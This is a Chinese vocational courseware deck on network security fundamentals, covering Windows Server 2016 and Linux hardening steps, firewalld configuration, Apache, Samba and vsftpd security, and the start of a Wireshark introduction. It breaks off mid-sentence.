《计算机网络安全技术》高职全套教学课件

计算机网络安全技术（活页新形态）全套可编辑PPT课件

网络安全基础知识Windows操作系统安全配置Linux操作系统安全配置网络安全技术常见的系统漏洞常见的软件漏洞第一章网络安全基础知识本课件是可编辑的正常PPT课件1.1网络安全的内涵本课件是可编辑的正常PPT课件1.1.1网络安全的定义网络安全是指网络系统的硬件、软件及系统中的数据受到保护，不因偶然的或恶意的原因而被破坏、更改、泄露，系统连续、可靠、正常地运行，网络服务不中断。本课件是可编辑的正常PPT课件1.1.2网络安全的特性1．完整性2．可用性3．可靠性4．保密性5．可控性6．不可抵赖性本课件是可编辑的正常PPT课件1.2网络安全威胁本课件是可编辑的正常PPT课件1.2.1网络安全威胁的类型1．黑客攻击黑客是指利用网络技术中的一些缺陷和漏洞，对计算机系统进行非法入侵的人。黑客攻击的意图是阻碍合法网络用户使用相关服务或破坏正常的商务活动。2．非授权访问非授权访问是指未经授权实体的同意获得了该实体的服务或资源。3．计算机病毒、木马和蠕虫计算机病毒是指制作者在计算机程序中插入的破坏计算机功能、毁坏数据、影响计算机使用并能自我复制的一组计算机命令或程序代码。木马是通过伪装自身来吸引用户下载和执行，向施种者提供打开被种者计算机的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种者的计算机。蠕虫是一种特殊的计算机病毒，不需要将自身附着到宿主程序上，而是传播自身功能的副本或某些部分到其他的计算机系统中。本课件是可编辑的正常PPT课件1.2.1网络安全威胁的类型4．拒绝服务拒绝服务（DenialofService，DoS）的主要手段是对系统的信息或其他资源发送大量的非法连接请求，从而导致系统产生过量负载，最终使合法用户无法使用系统的资源。5．内部入侵内部入侵也被称为授权侵犯，是指被授权以某一目的使用某个系统或资源的个人，利用此权限进行其他非授权活动。本课件是可编辑的正常PPT课件1.2.2产出网络安全威胁的原因1．薄弱的认证环节网络上的认证通常是使用口令来实现的，但口令具有薄弱性。口令破译中最常用的两种方法是把加密的口令解密和通过信道窃取口令。2．系统的易被监视性用户使用Telnet或FTP连接远程主机上的账户，在网络上传输的口令是未加密的。入侵者可以通过监视携带用户名和口令的IP包来获取它们，然后使用这些用户名和口令通过正常渠道登录系统。本课件是可编辑的正常PPT课件1.2.2产出网络安全威胁的原因3．易欺骗性TCP或UDP服务相信主机的IP地址，如果使用IPSourceRouting，攻击者的主机就可以冒充一个被信任的主机。4．有缺陷的局域网服务和相互信任的主机主机的安全管理既困难又费时。为了降低管理要求并增强局域网的性能，一些站点使用了如MS、NFS的服务。这些服务通过允许一些数据库（如口令文件）以分布式方式管理主机，以及允许系统共享文件和数据，在很大程度上减轻了管理的工作量。但这些服务也带来了不安全因素，有经验的闯入者可以利用这些服务获取访问权限。本课件是可编辑的正常PPT课件1.2.2产出网络安全威胁的原因5．复杂的配置和控制主机的访问控制配置复杂且难以验证，因此偶然的配置错误会使入侵者获取访问权限。6．无法估计主机的安全性随着一个站点主机数量的增加，确保每台主机的安全性都处在高水平的能力却在下降，使用管理一台主机的能力来管理如此多的主机就容易犯错误。另外，系统管理的作用经常变换并行动迟缓，这导致一些系统的安全性比较低，这些系统将成为薄弱环节。本课件是可编辑的正常PPT课件1.3增强网络安全的技术本课件是可编辑的正常PPT课件1.3.1信息加密技术加密是指通过计算机网络中的加密机制，把网络中各种原始的数字信息（明文），按照某种特定的加密算法转换为与明文完全不同的数字信息（密文）的过程。信息加密技术是提高网络信息的机密性、真实性，防止信息被未授权的第三方窃取或篡改所使用的技术，它还具有数字签名、身份验证、秘密分存、系统安全等功能。本课件是可编辑的正常PPT课件1.3.2防火墙技术防火墙是指在内部网络和外部网络之间实施安全防范的系统，用于加强网络间的访问控制，保护内部网络的设备不被破坏，防止内部网络的敏感数据被窃取。防火墙的主要功能有过滤进出网络的数据包、管理进出网络的访问行为、封堵某些禁止的访问行为，以及记录通过防火墙的信息内容和活动、对网络攻击进行检测和报警等。本课件是可编辑的正常PPT课件1.3.3防病毒技术防病毒技术包括三类技术：1、预防病毒2、检测病毒3、清除病毒本课件是可编辑的正常PPT课件1.3.4入侵检测技术入侵检测（IDS）是对面向计算资源和网络资源的恶意行为的识别和响应。入侵检测系统是对防火墙的必要补充，它从系统内部和各种网络资源中主动采集信息，从中分析可能的网络入侵或攻击。入侵检测系统既可以及时发现系统和网络的入侵者，也可以防止合法用户对资源的误操作。本课件是可编辑的正常PPT课件1.3.5虚拟专用网络技术虚拟专用网络（VPN）技术采用互联网技术实现在特定范围内加密的安全通信技术技术核心是采用隧道（Tunneling）技术将企业专用网络中的数据加密封装后通过虚拟的公网隧道进行传输，从而防止敏感数据被窃取。本课件是可编辑的正常PPT课件1.4网络安全的现状与发展趋势本课件是可编辑的正常PPT课件1.4.1网络安全的现状1．我国对网络安全的政策法律支持2016年11月，《中华人民共和国网络安全法》出台。2017年6月1日，《中华人民共和国网络安全法》正式施行，成为我国网络空间法治化建设的重要里程碑。2021年4月27日，通过《关键信息基础施安全保护条例》。6月10日，通过《中华人民共和国数据安全法》，自9月1日起施行。7月10日，发布关于《网络安全审查办法（修订草案征求意见稿）》。7月12日，发布《网络安全产业高质量发展三年行动计划（2021-2023年）（征求意见稿）》；同日，工业和信息化部、国家互联网信息办室、公安部联合印发《网络产品安全漏洞管理规定》，自9月1日起施行。本课件是可编辑的正常PPT课件7月20日，《2020年中国互联网网络安全报告》正式发布。7月30日，公布《关键信息基础设施安全保护条例》，自9月1日起施行。8月20日，全国人大常委会表决通过《中华人民共和国个人信息保护法》，自11月1日起施行。2022年1月12日，国务院印发《“十四五”数字经济发展规划》。2月13日，征求对《工业和信息化领域数据安全管理办法（试行）》的意见。3月2日，中央网信办、教育部、工业和信息化部、人力资源社会保障部联合印发《2022年提升全民数字素养与技能工作要点》。3月5日，2022年《政府工作报告》发布，提到了国务院将强化网络安全、数据安全和个人信息保护。本课件是可编辑的正常PPT课件2．网络安全需求规模分析在“互联网+”时代，物联网发展迅猛，正加速渗透到生产、消费、安全防护和社会管理等领域。物联网给我们的工作和生活带来便利的同时，也带来了风险。在新场景及新技术的驱动下，防护对象改变，企业网络边界逐渐消失，政府和企业网络信息安全防护理念发生较大变化，逐渐从“被动安全”向“主动安全”转变。安全产品软件、硬件的国产化推动了产品的更新换代，信息安全核心软件、硬件国产化带来自主可控的信息安全装备平台的巨大需求。“云大物移”的发展将使传统的网络安全产品不再能满足客户需求，从而迫使网络安全产业转变安全理念，更加重视网络安全中的主动防御，进行革新。本课件是可编辑的正常PPT课件1.4.2网络安全的发展趋势近年来，随着我国信息化程度的不断提高，国内网络安全市场规模快速增长。国内提供网络安全产品的企业数量众多，模式尚不统一，市场竞争激烈，网络安全行业集中度较低，尽管行业格局相对分散，但行业集中度保持提高的态势。随着网络信息技术的升级，针对日趋复杂的网络环境和实际需求，网络安全技术正朝着复杂化、多元化、个性化、智能化的方向发展，且技术迭代时间越来越短，对网络安全企业的产品研发提出了更高的要求。网络安全市场的份额开始向具有一定技术实力和品牌知名度的厂商汇聚，市场集中度逐步提高。本课件是可编辑的正常PPT课件第二章Windows操作系统安全配置本课件是可编辑的正常PPT课件2.1认识Windows操作系统本课件是可编辑的正常PPT课件2.1.1什么是Windows操作系统Windows是美国微软公司以图形用户界面（GUI）为基础研发的操作系统，主要运用于计算机、智能手机等设备，共有普通版本、服务器版本（WindowsServer）、手机版本（WindowsPhone等）、嵌入式版本（WindowsCE等）等子系列，是全球应用最广泛的操作系统之一。本课件是可编辑的正常PPT课件2.1.2WindowsServer2016概述

WindowsServer2016是微软公司专门为服务器提供的一款图形化操作系统，可以帮助信息部门的IT人员来搭建网站、应用程序服务及虚拟化云服务等。WindowsServer2016具有强大的管理功能和安全措施来简化网站的部署与服务器的管理，能够改善资源可用性、降低成本、保护企业应用程序和数据的安全，使运维人员更加轻松地管理服务器和维护应用程序。本课件是可编辑的正常PPT课件2.1.3WindowsServer2016版本WindowsServer2016分为3个版本：1.DatacenterEdition（数据中心版）2.StandardEdition（标准版）3.EssentialsEdition（基本版）本课件是可编辑的正常PPT课件2.2用户和组的安全管理本课件是可编辑的正常PPT课件用户是具有登录系统和访问资源权限的个人账户。在WindowsServer2016中，每个用户都有一个唯一的用户名和密码，这些信息用于登录系统。用户可以被授权访问特定的文件、文件夹、共享资源、应用程序、设备等。管理员可以通过设置访问权限来对用户进行管理。2.2.1用户安全管理本课件是可编辑的正常PPT课件1．修改Administrator账户名称WindowsServer2016内置了两个可供使用的用户账户。Administrator（系统管理员）：Administrator账户拥有最高的权限，用户可以使用此账户来管理计算机。Guest（来宾）：它是供没有账户的用户临时使用的，只有很少的权限，可以更改名称，但是无法被删除。此账户默认是被禁用的，如果没有禁用，则可以手动禁用此账户。本课件是可编辑的正常PPT课件左键“开始”图标，在弹出的快捷菜单中选择“运行”命令，打开“运行”窗口，输“gpedit.msc”，单击“确定”按钮。打开“本地组策略编辑器”窗口，依次选择“计算机配置”→“Windows设置”→“安全设置”→“本地策略”→“安全选项”选项。在右侧找到“账户：重命名系统管理员账户”选项并右击，在弹出的快捷菜单中选择“属性”命令，弹出“账户：重命名系统管理员账户属性”对话框。输入新的账户名称，单击“确定”按钮。本课件是可编辑的正常PPT课件2．禁用Guest账户左键“开始”图标，在弹出的快捷菜单中选择“计算机管理”命令，打开“计算机管理”窗口。选择“计算机管理（本地）”→“本地用户和组”→“用户”→“Guest”选项，右击，在弹出的快捷菜单中选择“属性”命令。弹出“Guest属性”对话框，勾选“账户已禁用”复选框。本课件是可编辑的正常PPT课件3．设置用户账户密码右击“开始”图标，在弹出的快捷菜单中选择“计算机管理”命令，打开“计算机管理”窗口。选择“计算机管理（本地）”→“本地用户和组”→“用户”→“User”选项（以User账户为例），右击，在弹出的快捷菜单中选择“设置密码”命令。弹出“为User设置密码”对话框，输入新密码，单击“确定”按钮。本课件是可编辑的正常PPT课件4．创建密码盘密码盘的工作原理如下。（1）硬件层面：密码盘需要支持硬件虚拟化和安全启动功能。（2）安全启动：当服务器启动时，密码盘会启动安全启动功能，验证操作系统和启动文件的完整性，并确保它们没有被篡改。（3）安全运行环境：密码盘创建一个安全的虚拟化环境，用于存储用户凭据和加密密钥。这个环境是隔离的，不受主操作系统的影响。本课件是可编辑的正常PPT课件（4）认证和加密：当用户登录时，密码盘将用户凭据传递给安全运行环境中的身份验证服务。如果凭据正确，则密码盘返回一个加密密钥，用于保护用户凭据。（5）访问控制：密码盘会根据用户的访问权限，限制用户对虚拟化环境中凭据的访问本课件是可编辑的正常PPT课件我们可以使用可移动磁盘（以U盘为例）来制作密码重置盘。在计算机上插入已经格式化的U盘，登录账户之后，左键“开始”图标，在弹出的快捷菜单中选择“控制面板”命令。打开“控制面板”窗口，选择“用户账户”→“创建密码重置盘”选项，打开“忘记密码向导”窗口。单击“下一步”按钮，选择密码密钥盘。单击“下一步”按钮，输入新密码。本课件是可编辑的正常PPT课件2.2.2组安全管理组是一组用户的集合，每个用户可以属于一个或多个组。在WindowsServer2016中，有一些内置的组，如Administrators、Users、Guests。本课件是可编辑的正常PPT课件在WindowsServer2016中对组进行安全管理的操作如下。单击“开始”图标→“服务器管理器”→“服务器管理器”→“仪表板”→“工具”→“计算机管理”→“本地组策略编辑器”→“本地用户和组”→“组”→“新建组”。在仪表板选项卡中选择“工具”→“本地安全策略”→“本地安全策略”→“本地策略”→“用户权限分配”→“关闭系统”双击→“关闭系统属性”对话框。选择“本地安全设置”→“本地安全设置”→选择相应的用户或组→“添加用户或组”，这样被添加的组就自动拥有了该项策略的权限了。本课件是可编辑的正常PPT课件2.3文件系统安全配置本课件是可编辑的正常PPT课件2.3.1设置文件权限右击需要设置权限的文件→“属性”→“安全”→打开“安全”选项卡。单击“高级”按钮→“高级安全设置”→“添加”→“选择主体”文字链接→“选择用户或组”→输入要选择的对象名称→“检查名称”→“确定”→弹出权限项目对话框→选择分配给用户的权限。本课件是可编辑的正常PPT课件2.3.2设置文件夹权限用户可以对文件夹进行的操作，包括列出文件夹内的文件名、在文件夹内创建文件等。NTFS为每个文件夹提供了一个访问控制列表。选中需要设置权限的文件夹并右击→选择“属性”命令→打开文件夹属性对话框→单击“安全”→“编辑”。如果需要编辑系统权限，则可以单击属性对话框中“安全”选项卡的“高级”按钮。本课件是可编辑的正常PPT课件2.3.3文件加密文件加密可以保护敏感数据，防止未经授权的用户访问和查看文件内容。右击需要加密的文件或文件夹→选择“属性”命令→单击“常规”选项卡→“高级”按钮→弹出“高级属性”对话框→勾选“加密内容以便保护数据”复选框→单击“确定”按钮。本课件是可编辑的正常PPT课件2.4服务安全配置和加固本课件是可编辑的正常PPT课件2.4.1服务安全配置1．开启系统自动更新功能使用Win+R组合键打开“运行”窗口→输入“gpedit.msc”→“确定”→“本地组策略编辑器”→“计算机配置”→“管理模板”→“Windows组件”→“Windows更新”→“设置”→双击“配置自动更新”。打开“配置自动更新”窗口→“已启用”→“选项”列表框中可以配置其他属性→右击“开始”→“以管理员身份运行”→打开“管理员：WindowsPowerShell”→执行“gpupdate/force”命令，使设置生效。本课件是可编辑的正常PPT课件2．开启系统防火墙WindowsServer2016内置了一个名为Windows防火墙的功能，它可以帮助管理员保护服务器不受来自网络的未经授权的访问和攻击。左键“开始”→“控制面板”→“系统和安全”→“检查防火墙状态”→“启用或关闭Windows防火墙”→“自定义设置”→“专用网络设置和公用网络设置”→“启用Windows防火墙”。本课件是可编辑的正常PPT课件专用网络设置和公用网络设置的区别主要在于它们适用的网络环境及它们的默认安全级别。专用网络设置：专用网络指的是在组织内部使用的受信任网络，例如公司内部网络或内部数据中心的网络。公用网络设置：公用网络指的是在公共场所使用的不受信任的网络，例如咖啡店、机场或公共图书馆的网络。本课件是可编辑的正常PPT课件3．配置防火墙规则1）入站规则2）出站规则3）程序规则4）安全组规则5）认证规则6）边界规则本课件是可编辑的正常PPT课件4．开启IE增强安全配置启用IE增强的安全配置后，服务器的IE浏览器将只能访问白名单中的网站。单击“开始”→“服务器管理器”→“仪表板”→“配置此本地服务器”→“IE增强的安全配置”→“启用”→在弹出的“InternetExplorer增强的安全配置”对话框中根据需求设置管理员和用户是否启用InternetExplorer增强的安全配置。本课件是可编辑的正常PPT课件2.4.2服务安全加固RemoteRegistryService是WindowsServer2016中的一项服务，它允许用户通过网络远程访问计算机上的注册表。主要作用有以下几个方面。1．远程管理2．集中管理3．故障排除本课件是可编辑的正常PPT课件2.5本地安全策略本课件是可编辑的正常PPT课件2.5.1账户策略配置账户策略用于控制用户登录失败的次数和时间，从而防止攻击者暴力破解密码。“开始”图标→“服务器管理器”→“仪表板”→“工具”→“计算机管理”→“本地组策略编辑器”→“本地计算机策略”→“计算机配置”→“Windows设置”→

“安全设置”→“账户策略”→“密码策略”→右侧可以设置关于账户密码的一些策略，左侧“账户锁定策略”选项可以设置账户锁定时间等策略。本课件是可编辑的正常PPT课件2.5.2本地策略配置“开始”图标→“服务器管理器”→“仪表板”→“工具”→“计算机管理”→“本地组策略编辑器”→“本地计算机策略”→“计算机配置”→“Windows设置”→“安全设置”→“本地策略”。“审核策略”包含“审核登录事件”“审核对象访问”等策略。“用户权限分配”包含“备份文件和目录”“创建符号链接”“创建全局对象”等策略。“安全选项”包含与交互式登录、关机等相关的策略。本课件是可编辑的正常PPT课件设置本地策略的注意事项：（1）在设置密码策略时，需要确保密码长度、复杂度等符合实际需求和安全要求。（2）在设置账户锁定策略时，需要根据实际情况来选择合适的锁定阈值和锁定时长，以确保系统安全和用户体验的平衡。（3）在检查设置是否生效时，可以根据实际需要选择不同的方法和工具，以确保策略生效并能及时发现和处理相关安全事件。本课件是可编辑的正常PPT课件2.6域和活动目录安全管理本课件是可编辑的正常PPT课件1．安装ActiveDirectory服务（域控制器）WindowsServer2016中的ActiveDirectory是一种目录服务，它是基于LDAP（LightweightDirectoryAccessProtocol）的一种分布式数据库系统。ActiveDirectory用于管理网络中的用户、组、计算机和其他资源，并提供集中化的认证和授权机制，从而实现对网络资源的安全访问和管理。2.6.1域和域控制器安全策略配置本课件是可编辑的正常PPT课件“开始”图标→“服务器管理器”→“仪表板”→“添加角色和功能”→“添加角色和功能向导”→“下一步”→“选择安装类型”→“基于角色或基于功能的安装”→“下一步”→“选择目标服务器”→“从服务器池中选择服务器”→“下一步”→“选择服务器角色”→勾选“ActiveDirectory域服务”→“添加角色和功能向导”→“添加功能”回到“选择服务器角色”→“下一步”→“选择服务器角色”→勾选“ActiveDirectory域服务”→“添加角色和功能向导”→“添加功能”回到“选择服务器角色”→“下一步”→“选择功能”、“ActiveDirectory域服务”使用默认选项→“确认安装所选内容”→“安装”→“关闭”按钮回到“仪表板”→“通知”→“将此服务器提升为域控制器”→“ActiveDirectory域服务配置向导”→“添加新林”→“根域名”中输入“”，→“下一步”→“域控制器选项”→键入目录服务还原模式（DSRM）密码→“下一步”→其他窗口中使用默认选项即可→“安装”→自动重启。本课件是可编辑的正常PPT课件在WindowsServer2016中，ActiveDirectory主要有以下几个特点：1）集中化的用户管理2）集中化的认证和授权机制3）统一的命名空间4）可扩展性和可定制性5）支持分布式管理6）安全性和稳定性本课件是可编辑的正常PPT课件2．域安全策略配置域安全策略是一种安全性设置，用于保障域中计算机的安全。它是一组规则和设置，定义了域中所有计算机的安全策略和配置，并指定了哪些用户和组可以访问计算机和域资源。“开始”图标→“Windows管理工具”→“组策略管理”→“林：”→“域”→“”→“DefaultDomainPolicy”→“编辑”本课件是可编辑的正常PPT课件注意事项：（1）隶属于域的任何一台计算机都会受到域安全策略的影响。（2）隶属于域的计算机，如果本地安全策略的配置与域安全策略的配置有冲突，则以域安全策略的配置优先，也就是说本地安全策略自动无效。（3）当域安全策略的配置发生变化时，这些策略需要应用到本地计算机后才对本地计算机有效。本课件是可编辑的正常PPT课件2.6.2活动目录安全管理活动目录（ActiveDirectory）是面向WindowsStandardServer、WindowsEnterpriseServer和WindowsDatacenterServer的目录服务。活动目录作为目录服务，存在一定的安全隐患。我们可以通过对活动目录进行安全管理，来达到保证数据安全和服务安全的目的。本课件是可编辑的正常PPT课件1．配置密码策略“开始”图标→“服务器管理器”→“仪表板”→“工具”→“计算机管理”→“本地组策略编辑器”→“计算机配置”→“Windows设置”→“安全设置”→“账户策略”→“密码策略”→配置密码策略→“确定”，从而应用新的密码策略配置。本课件是可编辑的正常PPT课件密码策略包含以下策略选项：1）强制密码历史2）密码长度最小值3）密码最长使用期限4）密码必须符合复杂性要求本课件是可编辑的正常PPT课件2．配置账户锁定策略“开始”图标→“服务器管理器”→“仪表板”→“仪表板”→“工具”→“计算机管理”→“本地组策略编辑器”→“计算机配置”→“Windows设置”→“安全设置”→“账户策略”→“账户锁定策略”→在窗口右侧可以设置账户锁定时间、尝试次数等本课件是可编辑的正常PPT课件3．定期更新和维护“开始”图标→“控制面板”→“控制面板”→“系统和安全”→“更改安全和维护设置”→勾选“自动维护”。“开始”→“设置”→“更新和安全”→“Windows更新”→及时安装。本课件是可编辑的正常PPT课件第三章Linux操作系统安全配置本课件是可编辑的正常PPT课件3.1认识Linux操作系统本课件是可编辑的正常PPT课件3.1.1Linux操作系统使用调查1．您是否了解Linux操作系统？

□了解

□只是听说

□不了解2．您目前是否使用Linux操作系统？

□从来不用

□偶尔用

□经常用3．Linux操作系统的哪些优点是您优先考虑的？

□灵活简便

□安全性较高

□免费开源4．您目前使用Linux操作系统主要应用的软件有哪些？

□Web服务器

□数据库系统

□安全软件5．Linux操作系统目前在中国有哪些应用？

□服务器操作系统

□桌面操作系统

□应用软件本课件是可编辑的正常PPT课件6．您认为目前Linux操作系统主要应用在哪些领域？

□科研机构

□金融机构

□政府机构7．您认为Linux操作系统将来会有怎样的发展？

□在日常生活中被广泛应用

□在企业中被广泛应用

□出现成熟的开发社区8．您目前的职业是？

□大学生

□大学毕业生

□其他9．您知道的Linux操作系统有哪些？

_______________________________________________________。10．Linux操作系统诞生于哪个国家？

_______________________________________________________

。本课件是可编辑的正常PPT课件3.1.2什么是Linux操作系统Linux是一套可以免费使用和自由传播的开源的类UNIX操作系统，是一款基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统。本课件是可编辑的正常PPT课件3.1.3Linux操作系统的起源Linux操作系统的诞生、发展和成长过程有5个重要支柱：1.UNIX操作系统2.Minix操作系统3.GNU计划4.POSIX标准5.Internet本课件是可编辑的正常PPT课件3.2用户和组的安全管理本课件是可编辑的正常PPT课件1．用户标识我们在登录Linux主机的时候，输入的是我们的账户，但是其实Linux主机并不会直接认识账户名称，它仅仅认识ID（一组相关数字号码）。其实我们登录的账户至少会取得两个ID，一个是用户ID（UserID，UID），一个是组ID（GroupID，GID）。3.2.1了解Linux操作系统中的用户本课件是可编辑的正常PPT课件2．用户的概念Linux操作系统中，用户一般分为3种：超级用户、普通用户、系统服务用户。超级用户的用户名为root，用户ID为0，有系统最高的管理权。普通用户的用户ID默认从1000开始。系统服务用户的用户ID默认为1～499，仅供系统服务使用，默认设置为不可登录。本课件是可编辑的正常PPT课件3．管理用户1）创建用户命令用法：useradd[选项]<用户名>添加用户的示例如下：[root@localhostuser]#useradduser1useradd命令的选项与功能如表3-2-1所示。本课件是可编辑的正常PPT课件2）删除用户命令用法：userdel[选项]<用户名>删除用户的示例如下：[root@localhostuser]#userdeluser1userdel命令的选项与功能如表3-2-2所示。本课件是可编辑的正常PPT课件3）修改用户参数命令用法：usermod[选项]<用户名>usermod命令的选项与功能如表3-2-3所示。本课件是可编辑的正常PPT课件系统已经规定了非常多的默认值，所以用户可以简单地使用“useradd用户名”命令来创建用户。这些默认值会帮助我们完成以下操作。（1）在/etc/passwd文件中创建一行与账户相关的数据，包括创建UID、GID、主文件夹等。（2）在/etc/shadow文件中填入与账户的密码相关的参数，但是尚未有密码。（3）在/etc/group文件中创建一个与账户名称相同的组。（4）在/home目录下创建一个与账户名称相同的目录作为用户的主文件夹，并且文件夹的权限为700。本课件是可编辑的正常PPT课件4）修改用户密码及其安全管理命令用法：passwd[选项]<用户名>passwd命令的选项与功能如表3-2-4所示。本课件是可编辑的正常PPT课件5）切换用户Linux操作系统中，我们针对不同的操作常常会切换不同的身份，切换身份的原因一般有以下几种。（1）使用一般账户。（2）使用较低权限启动系统服务。（3）软件本身的限制。命令用法：su<用户名>su命令的选项与功能如表3-2-5所示。本课件是可编辑的正常PPT课件6）sudo命令命令用法：sudo[选项]<命令>与su命令相比，使用sudo命令并不需要输入root用户的密码，只需要输入当前用户的密码。只有在/etc/sudoers配置文件中的用户才能够使用sudo命令。在默认情况下，只有root用户才可以使用sudo命令。流程如下：（1）当执行sudo命令时，系统会在/etc/sudoers文件中查找该用户是否具有执行sudo命令的权限。（2）如果用户具有执行sudo命令的权限，则让用户来输入自己的密码进行验证。（3）如果当前用户输入的密码是正确的，则sudo命令可以执行后续命令（root用户执行sudo命令不需要输入密码）。（4）如果想要切换的用户与当前用户是一致的，则不需要输入密码。本课件是可编辑的正常PPT课件

4．Linux用户身份与组记录的文件Linux操作系统中，默认情况下所有的系统上的账户、一般身份用户和root的相关信息，都记录在/etc/passwd文件中。每个用户的密码则记录在/etc/shadow文件中。此外，所有的组名都记录在/etc/group文件中。本课件是可编辑的正常PPT课件3.2.2了解Linux操作系统中的组1．组的概念组是一类特殊的账户，组是指具有相同或相似特性的用户集合。组一般可以划分为管理员组、普通组、系统组、登录组。一个用户可以同时属于多个组，其中某个组为该用户的主要组，其他组则作为该用户的附加组。本课件是可编辑的正常PPT课件2．管理组1）查看本机中组的信息命令用法：[root@localhostuser]#cat/etc/group文件内容格式如下：

root:x:0:

bin:x:1:

sys:x:3:

adm:x:4:

user:x:1000:

help:x:1002:该文件以“：”作为字段的分隔符，保存了本计算机中组的基本信息。本课件是可编辑的正常PPT课件本课件是可编辑的正常PPT课件2）创建组命令用法：groupadd[选项]<组名>本课件是可编辑的正常PPT课件3）删除组命令用法：groupdel<组名>4）修改组的参数命令用法：groupmod<组名>本课件是可编辑的正常PPT课件3．管理组成员1）将一个成员添加到组中命令用法：gpasswd-a<用户名><组名>2）将一个成员从组中移除命令用法：gpasswd-d<用户名><组名>3）设置组成员列表命令用法：gpasswd-M<用户名1>[<用户名2>，<用户名3>，...]<组名>4）设置组管理员密码命令用法：gpasswd<组名>5）删除组管理员密码命令用法：gpasswd-r<组名>6）查看用户加入的组命令用法：groups[用户名]本课件是可编辑的正常PPT课件3.2.3用户和组的安全管理1．设置安全用户在创建用户时，可以使用“-s”选项指定用户的登录SHELL为/sbin/nologin，从而将其设置为安全用户。2．禁用root账户命令用法：[root@localhostuser]#vim/etc/ssh/sshd_config//打开配置文件3．设置用户密码复杂度1）修改配置文件/etc/login.defs2）修改配置文件/etc/pam.d/system-auth本课件是可编辑的正常PPT课件3.3防火墙安全配置本课件是可编辑的正常PPT课件3.3.1防火墙安全配置概述Linux防火墙是用于保护计算机安全的一种软件，其主要功能是控制网络流量，过滤非法访问和恶意流量，从而保护计算机。Linux防火墙通常包含以下几个基本概念。（1）防火墙规则（2）策略（3）防火墙状态1．防火墙的概念1）firewalld-cmd命令的使用2）开放或限制端口3）批量开放或限制端口4）禁止其他终端对服务器的ping5）允许特定的IP地址范围可以ping6）新增规则2．firewalld使用本课件是可编辑的正常PPT课件3.3.2防火墙安全配置实例——防火墙综合应用1．允许SSH连接（1）将SSH服务添加到防火墙允许的列表中。命令用法：[root@localhost~]#sudofirewall-cmd--add-service=ssh--permanent//将SSH服务添加到防火墙允许列表中，并将更改永久保存在防火墙的配置文件中（2）重新加载防火墙配置。命令用法：[root@localhost~]#sudofirewall-cmd--reload本课件是可编辑的正常PPT课件2．允许HTTP和HTTPS连接（1）将HTTP和HTTPS服务添加到防火墙允许的列表中。命令用法：[root@localhost~]#sudofirewall-cmd--add-service=http--permanent[root@localhost~]#sudofirewall-cmd--add-service=https

--permanent//将HTTP和HTTPS服务添加到防火墙允许的列表中，并将更改永久保存在防火墙的配置文件中（2）重新加载防火墙配置。命令用法：[root@localhost~]#sudofirewall-cmd--reload本课件是可编辑的正常PPT课件3．阻止ICMP测试在防火墙中禁用ICMP测试。命令用法：[root@localhost~]#sudofirewall-cmd--add-rich-rule='ruleprotocolvalue="icmp"drop'--permanent//添加防火墙规则，将ICMP测试的协议设置为drop（即阻止）[root@localhost~]#sudofirewall-cmd–reload//重新加载防火墙配置本课件是可编辑的正常PPT课件3.4Apache的安全配置本课件是可编辑的正常PPT课件当请求一个服务器上不存在的资源时，服务器会暴露系统信息、服务器版本及开放的端口等信息。为了保证服务器的安全，我们一般会将这些信息隐藏3.4.1隐藏Apache敏感信息本课件是可编辑的正常PPT课件3.4.2为Apache使用专门的用户和组按照最小权限原则，我们需要给Apache分配一个合适的权限，让其能够完成Web服务。为了使Web服务更加安全，必须保Apache使用一个专门的用户和组，不能使用系统预定的账户。本课件是可编辑的正常PPT课件1．什么是ACL2．如何启动ACL3．ACL配置技巧4．禁止目录浏览5．错误页面重定向6．记录POST数据7．升级Apache版本和组件8．配置HTTPS9．防止文件注入攻击10．配置访问控制3.4.3设置ACL本课件是可编辑的正常PPT课件3.5Samba的安全配置本课件是可编辑的正常PPT课件3.5.1客户端密码加密Samba默认为客户端使用明文密码。我们可以通过编辑/etc/samba/smb.conf配置文件将密码修改为密语。本课件是可编辑的正常PPT课件1．IP地址访问控制2．主机名访问控制3．用户或组访问控制4．对Samba进行更新5．开启安全审计功能3.5.2进行访问控制本课件是可编辑的正常PPT课件3.6Vsftpd的安全配置本课件是可编辑的正常PPT课件Vsftpd（非常安全的FTP守护进程）是一款运行在Linux操作系统上的FTP服务程序，不仅完全开源而且免费，还具有很高的安全性、传输速度，以及支持虚拟用户验证等其他FTP服务程序不具备的特点。本课件是可编辑的正常PPT课件3.6.1匿名开放模式在Vsftpd中，匿名开放模式是最不安全的一种认证模式。任何人都可以无须密码验证而直接登录FTP服务器。这种模式一般用来访问不重要的公开文件（在生产环境中尽量不要存放重要文件）。本课件是可编辑的正常PPT课件3.6.2本地用户模式与匿名开放模式相比，本地用户模式更安全，而且配置起来也很简单。本课件是可编辑的正常PPT课件3.6.3虚拟用户模式虚拟用户模式是这3种模式中最安全的一种认证模式，配置流程会稍微复杂一些。（1）创建用于进行FTP认证的用户数据库文件。（2）创建Vsftpd用于存储文件的根目录及可以映射到虚拟用户的系统本地用户。（3）建立用于支持虚拟用户的PAM文件。（4）在Vsftpd的主配置文件中通过pam_service_name参数将PAM认证文件的名称修改为vsftpd.vu。（5）为虚拟用户设置不同的权限。（6）先设置SELinux域允许策略，然后使用虚拟用户模式登录FTP服务器。本课件是可编辑的正常PPT课件3.6.4常用安全操作常用安全操作1．限制链接数2．限制传输速度本课件是可编辑的正常PPT课件第四章网络安全技术本课件是可编辑的正常PPT课件4.1数据包分析本课件是可编辑的正常PPT课件4.1.1数据包分析概述数据包分析1.数据包分析的意义分析数据包可以使信息传输不再存在秘密对数据包进行深入分析，是为了更好地了解网络是如何运行，数据包是如何被转发，应用是如何被访问当再次出现网络故障或网络应用问题时，就能够很快地解决2.数据包分析的内容（1）了解网络的工作原理。（2）查看网络使用情况及网络上的通信主体。（3）确认哪些应用占用带宽。（4）识别网络中存在的攻击或恶意行为。（5）分析网络故障和延时大小。（6）查看用户访问应用的速度。（7）优化和改进应用性能。3.获取数据包（1）通过数据链路层获取（2）通过网络层获取本课件是可编辑的正常PPT课件1.Wireshark的特点（1）深入检查数百种协议，并且不断添加更多协议（2）实时捕获和离线分析（3）标准三窗格数据包浏览器（4）多平台：在Windows、Linux、macOS、Solaris、FreeBSD、NetBSD和其他许多平台上运行（5）可以通过GUI或通过TTY模式的TShark实用程序浏览捕获的网络数据（6）业界最强大的显示过滤器（7）丰富的VoIP分析（8）读/写许多不同的捕获文件格式（9）可以动态解压缩使用Gzip压缩的捕获文件（10）实时数据从以太网、IEEE802.11、PPP/HDLC、ATM、蓝牙、USB、令牌环、帧中继、F